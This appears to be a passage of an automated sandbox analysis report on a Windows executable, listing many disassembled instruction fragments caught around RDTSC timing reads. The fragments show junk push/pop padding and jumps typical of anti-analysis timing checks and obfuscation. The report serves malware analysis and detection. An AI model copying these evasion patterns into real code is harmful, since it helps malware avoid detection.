Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7838A second address: A783D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 je 00007FDE8CE8B4C6h 0x0000000e push 0000001Eh 0x00000010 push 00000000h 0x00000012 push esi 0x00000013 call 00007FDE8CE8B4C8h 0x00000018 pop esi 0x00000019 mov dword ptr [esp+04h], esi 0x0000001d add dword ptr [esp+04h], 00000018h 0x00000025 inc esi 0x00000026 push esi 0x00000027 ret 0x00000028 pop esi 0x00000029 ret 0x0000002a clc 0x0000002b push eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f jmp 00007FDE8CE8B4D2h 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A784F2 second address: A784F7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A78757 second address: A787E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FDE8CE8B4C8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov dword ptr [ebp+122D3933h], ecx 0x0000002a jmp 00007FDE8CE8B4D7h 0x0000002f lea eax, dword ptr [ebp+1247C342h] 0x00000035 mov di, 078Fh 0x00000039 push eax 0x0000003a jmp 00007FDE8CE8B4D5h 0x0000003f mov dword ptr [esp], eax 0x00000042 mov ecx, dword ptr [ebp+122D2C2Fh] 0x00000048 lea eax, dword ptr [ebp+1247C2FEh] 0x0000004e movsx ecx, bx 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jnp 00007FDE8CE8B4C6h 0x0000005b jnp 00007FDE8CE8B4C6h 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB80E8 second address: AB80FF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a je 00007FDE8C51D4D6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB80FF second address: AB8119 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D3h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB8119 second address: AB811E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB811E second address: AB815F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FDE8CE8B4C6h 0x0000000a pop edi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e jmp 00007FDE8CE8B4D6h 0x00000013 push edx 0x00000014 jmp 00007FDE8CE8B4D6h 0x00000019 pop edx 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB815F second address: AB8168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB8168 second address: AB816C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB816C second address: AB8180 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB82CF second address: AB82D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB843E second address: AB8460 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDE8C51D4D6h 0x00000008 jl 00007FDE8C51D4D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FDE8C51D4E2h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB85CA second address: AB85DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FDE8CE8B4C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB85DA second address: AB85DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB85DE second address: AB85E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB85E8 second address: AB85EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB88A0 second address: AB88A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB88A4 second address: AB88AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB88AA second address: AB88B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB88B4 second address: AB88BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AB88BA second address: AB88BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD200 second address: ABD204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD204 second address: ABD20A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD8A0 second address: ABD8A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD8A9 second address: ABD8AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD8AD second address: ABD8C5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007FDE8C51D4DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jnp 00007FDE8C51D4E2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD8C5 second address: ABD8CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABD8CB second address: ABD8D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 js 00007FDE8C51D4DCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABDC14 second address: ABDC48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDE8CE8B4D8h 0x0000000e push esi 0x0000000f jmp 00007FDE8CE8B4CBh 0x00000014 jl 00007FDE8CE8B4C6h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABDC48 second address: ABDC5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E1h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE1D8 second address: ABE1DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE1DE second address: ABE1F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDE8C51D4DEh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE1F2 second address: ABE20B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FDE8CE8B4D3h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE20B second address: ABE20F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ABE20F second address: ABE241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007FDE8CE8B4CDh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FDE8CE8B4D8h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC24BF second address: AC24CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC24CA second address: AC24D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC24D5 second address: AC24D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC24D9 second address: AC24DF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4758 second address: AC4768 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FDE8C51D4D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4768 second address: AC476C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC42B2 second address: AC42C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4E2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC42C8 second address: AC42DC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FDE8CE8B4C6h 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC42DC second address: AC42EC instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDE8C51D4D6h 0x00000008 jng 00007FDE8C51D4D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4440 second address: AC4446 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AC4446 second address: AC444C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACB566 second address: ACB598 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FDE8CE8B4CFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FDE8CE8B4D3h 0x00000010 popad 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FDE8CE8B4C6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACB736 second address: ACB73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACB73C second address: ACB746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACEFE7 second address: ACEFEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACEFEB second address: ACF000 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007FDE8CE8B4C6h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACE9B7 second address: ACE9D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8C51D4E9h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACE9D6 second address: ACE9DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACECDB second address: ACECE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007FDE8C51D4D6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ACECE8 second address: ACED01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5850 second address: AD5856 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5B3D second address: AD5B48 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007FDE8CE8B4C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5B48 second address: AD5B51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5CDA second address: AD5CE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5CE7 second address: AD5CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5CEB second address: AD5D13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDE8CE8B4D0h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDE8CE8B4CCh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5D13 second address: AD5D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5E47 second address: AD5E79 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDE8CE8B4C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FDE8CE8B4D3h 0x0000000f jmp 00007FDE8CE8B4D1h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AD5E79 second address: AD5E7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF39F second address: ADF3BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jng 00007FDE8CE8B4C8h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 jmp 00007FDE8CE8B4CBh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADF3BE second address: ADF3D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DAh 0x00000007 jmp 00007FDE8C51D4DBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD3A1 second address: ADD3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD3A5 second address: ADD3AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD502 second address: ADD52F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDE8CE8B4D1h 0x00000009 jbe 00007FDE8CE8B4C6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDE8CE8B4CDh 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD52F second address: ADD535 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD535 second address: ADD56B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FDE8CE8B4C6h 0x0000000d jc 00007FDE8CE8B4C6h 0x00000013 jmp 00007FDE8CE8B4D1h 0x00000018 popad 0x00000019 popad 0x0000001a jnp 00007FDE8CE8B4F9h 0x00000020 push eax 0x00000021 push edx 0x00000022 jp 00007FDE8CE8B4C6h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD56B second address: ADD56F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD56F second address: ADD58D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8CE8B4D7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD6B9 second address: ADD6CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007FDE8C51D4DCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD6CD second address: ADD6D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD6D1 second address: ADD6EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4DFh 0x00000007 jo 00007FDE8C51D4DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD6EA second address: ADD6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD6F5 second address: ADD6FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD6FC second address: ADD701 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADD701 second address: ADD710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FDE8C51D4D6h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDA24 second address: ADDA2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDA2A second address: ADDA5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007FDE8C51D4EBh 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FDE8C51D4E3h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnl 00007FDE8C51D4D6h 0x0000001c jp 00007FDE8C51D4D6h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDA5A second address: ADDA5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDA5E second address: ADDA6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADDA6A second address: ADDA80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FDE8CE8B4C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jno 00007FDE8CE8B4C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE2A7 second address: ADE2BF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007FDE8C51D4D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDE8C51D4DAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE2BF second address: ADE2C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE844 second address: ADE848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ADE848 second address: ADE863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FDE8CE8B4CFh 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9168 second address: AE9184 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDE8C51D4E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE9184 second address: AE9188 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE92F6 second address: AE92FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE96D6 second address: AE96DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE96DC second address: AE96EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FDE8C51D4DEh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AE982E second address: AE9832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
